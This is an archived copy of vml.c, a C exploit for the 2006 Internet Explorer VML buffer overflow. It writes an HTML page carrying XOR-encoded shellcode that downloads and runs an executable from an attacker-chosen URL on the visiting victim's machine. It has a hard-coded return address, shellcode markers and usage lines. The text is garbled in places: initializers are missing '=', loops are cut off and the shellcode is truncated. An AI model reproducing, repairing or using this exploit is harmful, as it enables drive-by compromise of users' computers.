TUCoPS :: Browsers :: b06-4819.htm

vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit

* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit
* !!! 0day !!! Public Version !!!
* Copyright (C) 2006 XSec All Rights Reserved.
* Author : nop
* : nop#xsec.org
* : http://www.xsec.org 
* :
* Tested : Windows 2000 Server CN
* : + Internet Explorer 6.0 SP1
* :
* Complie : cl vml.c
* :
* Usage : d:\>vml
* :
* : Usage: vml  [htmlfile]
* :
* : d:\>vml http://xsec.org/xxx.exe xxx.htm 
* :


FILE *fp = NULL;
char *file = "xsec.htm";
char *url = NULL;

#define NOPSIZE 260
#define MAXURL 60

//DWORD ret = 0x7Ffa4512; // call esp for CN
DWORD ret = 0x7800CCDD; // call esp for All win2k

// Search Shellcode
unsigned char dc[] "\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39"

// Shellcode Start
unsigned char dcstart[] "noop";

// Download Exec Shellcode XOR with 0xee
unsigned char sc[] "\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65"

// Shellcode End
unsigned char dcend[] "n00p";

// HTML Header
char * header "\n"

// convert string to NCR
void convert2ncr(unsigned char * buf, int size)
int i=0;
unsigned int ncr = 0;

for(i=0; ihttp://www.xsec.org\n"); 
//printf("!!! 0Day !!! Please Keep Private!!!\n");
printf("\r\nUsage: %s  [htmlfile]\r\n\n", argv[0]);

url = argv[1];
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 
10 || strlen(url) > MAXURL)
printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d 
bytes.\n", MAXURL);

printf("[+] download url:%s\n", url);

if(argc >=3) file = argv[2];

printf("[+] exploit file:%s\n", file);

fp = fopen(file, "w+b");
//fp = fopen(file, "w");
printf("[-] Open file error!\n");

// print html header
fprintf(fp, "%s", header);

for(i=0; i

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